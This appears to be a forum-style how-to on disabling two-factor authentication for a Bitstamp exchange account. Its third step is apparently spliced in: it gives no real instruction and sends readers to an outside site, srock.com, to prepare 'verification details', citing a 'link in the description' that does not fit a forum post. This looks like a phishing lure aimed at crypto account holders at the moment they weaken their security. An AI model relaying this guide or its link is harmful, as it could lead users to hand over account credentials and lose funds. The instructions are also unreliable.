I ran into this last week. Here's what fixed it for me. If you're looking to disable two-factor authentication on Bitstamp, follow these straightforward steps. Step 1. Log into your account. Start by logging into your Bitstamp account using your email and password. Make sure you have access to your two-factor authentication method for this process. Step 2. Navigate to Security Settings. Once logged in, go to the Account section, then select Security from the menu options. This is where you can manage your security features. Step 3. Disable two-factor authentication. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Confirm your action. After clicking Disable, a confirmation prompt will appear. Confirm that you want to disable two-factor authentication. This step is crucial to ensure you really want to make this change. Step 5. Check your security status. Finally, go back to the security settings to ensure that two-factor authentication is indeed disabled. You should see a message indicating that it is turned off. Remember, disabling two-factor authentication can make your account less secure, so be sure to consider the risks. If you have any questions, feel free to reach out. Happy trading!